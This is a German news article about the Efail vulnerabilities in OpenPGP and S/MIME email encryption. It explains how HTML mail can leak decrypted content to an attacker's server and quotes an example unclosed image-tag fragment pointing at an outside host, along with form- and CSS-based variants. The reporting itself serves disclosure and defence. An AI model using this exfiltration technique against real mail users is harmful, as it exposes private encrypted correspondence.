Abo
  • IT-Karriere:

PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen

Ein Zusammenspiel von veralteten Verschlüsselungsmethoden und HTML-Mails erlaubt es in vielen Fällen, mit OpenPGP oder S/MIME verschlüsselte Nachrichten zu exfiltrieren. Bislang gibt es keine echten Fixes und nur unzureichende Workarounds.

Artikel von Hanno Böck veröffentlicht am
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter.
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter. (Bild: Jana Runde/Zuzana Somorovska)

Ein Forscherteam hat eine ganze Reihe von Problemen bei der Verwendung verschlüsselter E-Mails entdeckt. Die Efail getaufte Lücke betrifft beide standardisierten E-Mail-Verschlüsselungsverfahren - OpenPGP und S/MIME - und lässt sich in zahlreichen E-Mail-Clients ausnutzen.

Inhalt:
  1. PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen
  2. Verschlüsselung nicht authentifiziert
  3. Workarounds, Updates, Gegenmaßnahmen

Das Grundproblem: Verschlüsselung ohne Authentifizierung. S/MIME nutzt einen völlig unauthentifizierten Verschlüsselungsmodus, in OpenPGP ist zwar theoretisch eine Authentifizierung vorgesehen, die ist aber in der Praxis oft nutzlos.

Die Angriffe nutzen HTML-Mails, um entschlüsselte Daten an den Server des Angreifers zu schicken. Dabei wird eine bestehende E-Mail so umgestaltet, dass der HTML-Code eine Anfrage zu einem Server auslöst und dabei den entschlüsselten Text der Mail mitschickt.

Angriff über Multipart-Mails

Bereits daraus lässt sich in manchen Fällen ein Angriff konstruieren. E-Mail-Nachrichten können aus mehreren Teilen bestehen, sogenannte Multipart-Messages. In manchen Mailclients - am einfachsten in Apple Mail - ist es möglich, direkt aus dem HTML-Teil einer Nachricht auf den nachfolgenden Textteil zuzugreifen.

Stellenmarkt
  1. UmweltBank AG, Nürnberg
  2. Eppendorf AG, Jülich

Ein Angreifer kann nun Folgendes machen: Er schickt als ersten Teil einer Nachricht einen HTML-Teil, der beispielsweise ein Bild lädt, aber den HTML-Tag nicht schließt. Also etwa <img src="http://efail.de/. Als zweiten Teil hängt er den verschlüsselten Teil einer Mail an, die er mitgelesen hat, etwa über einen Man-in-the-Middle-Angriff zwischen den Mailservern. Im Mailclient des Opfers passiert nun Folgendes: Ein Bild wird vom Server des Angreifers geladen und als Pfad wird der Inhalt des nachfolgenden Textteils codiert angehängt.

In Apple Mail funktioniert dieser Angriff direkt, in Mozilla Thunderbird werden in der Standardeinstellung keine Bilder geladen. Doch auch hier ist es mit Tricks möglich, eine Exfiltration der Daten zu erreichen. So kann man beispielsweise per HTML ein Formular erzeugen, das die Daten des verschlüsselten Teils an den Angreifer schickt. Da man die Mail über CSS beliebig layouten kann, kann man das auch so machen, dass ein Klick irgendwo in der Mail dazu führt, dass das Formular abgeschickt wird.

Verschlüsselung nicht authentifiziert 
  1. 1
  2. 2
  3. 3
  4.  


Anzeige
Hardware-Angebote
  1. 529,00€ (zzgl. Versand)

mark.wolf 22. Mai 2018

Du solltest Dich mal ein klein wenig mit dem Recht auseinandersetzen. Auch dein...

Auspuffanlage 21. Mai 2018

Hi ich interpretiere das mal so, dass du wissen willst wo es diese Informationen gibt...

joo 17. Mai 2018

-------------------------------------------------------------------------------- +1...

phade 15. Mai 2018

Zumeist Mail von der Seamonkey-Suite (ergo Thunderbird). Nur nutzt das nix, wenn das für...

Mr Miyagi 15. Mai 2018

Natürlich *kann* es das. GnuPG könnte auch ein Abbild Deiner ganzen Mailbox im Speicehr...


Folgen Sie uns
       


Linksabbiegen mit autonomen Autos - Bericht

In Braunschweig testet das DLR an zwei Ampeln die Vernetzung von automatisiert fahrenden Autos und der Verkehrsinfrastruktur.

Linksabbiegen mit autonomen Autos - Bericht Video aufrufen
Google Game Builder ausprobiert: Spieldesign mit Karten statt Quellcode
Google Game Builder ausprobiert
Spieldesign mit Karten statt Quellcode

Bitte Bild wackeln lassen und dann eine Explosion: Solche Befehle als Reaktion auf Ereignisse lassen sich im Game Builder relativ einfach verketten. Der Spieleeditor des Google-Entwicklerteams Area 120 ist nicht nur für Einsteiger gedacht - sondern auch für Profis, etwa für die Erstellung von Prototypen.
Von Peter Steinlechner

  1. Spielebranche Immer weniger wollen Spiele in Deutschland entwickeln
  2. Aus dem Verlag Neue Herausforderungen für Spieler und Entwickler

Nachhaltigkeit: Jute im Plastik
Nachhaltigkeit
Jute im Plastik

Baustoff- und Autohersteller nutzen sie zunehmend, doch etabliert sind Verbundwerkstoffe mit Naturfasern noch lange nicht. Dabei gibt es gute Gründe, sie einzusetzen, Umweltschutz ist nur einer von vielen.
Ein Bericht von Werner Pluta

  1. Autos Elektro, Brennstoffzelle oder Diesel?
  2. Energie Wo die Wasserstoffqualität getestet wird
  3. Energiespeicher Heiße Steine sind effizienter als Brennstoffzellen

Noise Cancelling Headphones 700 im Test: Boses bester ANC-Kopfhörer sticht Sony vielfach aus
Noise Cancelling Headphones 700 im Test
Boses bester ANC-Kopfhörer sticht Sony vielfach aus

Bose schafft mit seinen neuen Noise Cancelling Headphones 700 eine fast so gute Geräuschreduzierung wie Sony und ist in manchen Punkten sogar besser. Die Kopfhörer haben uns beim Testen aber auch mal genervt.
Ein Test von Ingo Pakalski

  1. Bose Frames im Test Sonnenbrille mit Musik
  2. Noise Cancelling Headphones 700 ANC-Kopfhörer von Bose versprechen tollen Klang
  3. Frames Boses Audio-Sonnenbrille kommt für 230 Euro nach Deutschland

    •  /